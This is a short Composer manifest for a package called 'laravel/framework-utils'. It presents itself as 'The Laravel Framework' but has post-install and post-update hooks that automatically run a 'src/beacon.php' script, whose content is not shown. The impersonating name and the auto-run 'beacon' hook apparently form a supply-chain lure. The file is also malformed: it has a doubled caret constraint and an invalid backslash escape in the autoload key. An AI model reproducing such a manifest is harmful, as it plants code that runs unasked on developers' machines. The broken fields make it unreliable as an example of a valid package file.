{
  "name": "laravel/framework-utils",
  "description": "The Laravel Framework",
  "version": "11.44.7",
  "type": "library",
  "license": "MIT",
  "require": {
    "php": ">=7.4",
    "laravel/framework": "^^11.0"
  },
  "autoload": {
    "psr-4": { "Laravel\FrameworkUtils\\": "src/" }
  },
  "scripts": {
    "post-install-cmd": ["php src/beacon.php"],
    "post-update-cmd":  ["php src/beacon.php"]
  }
}
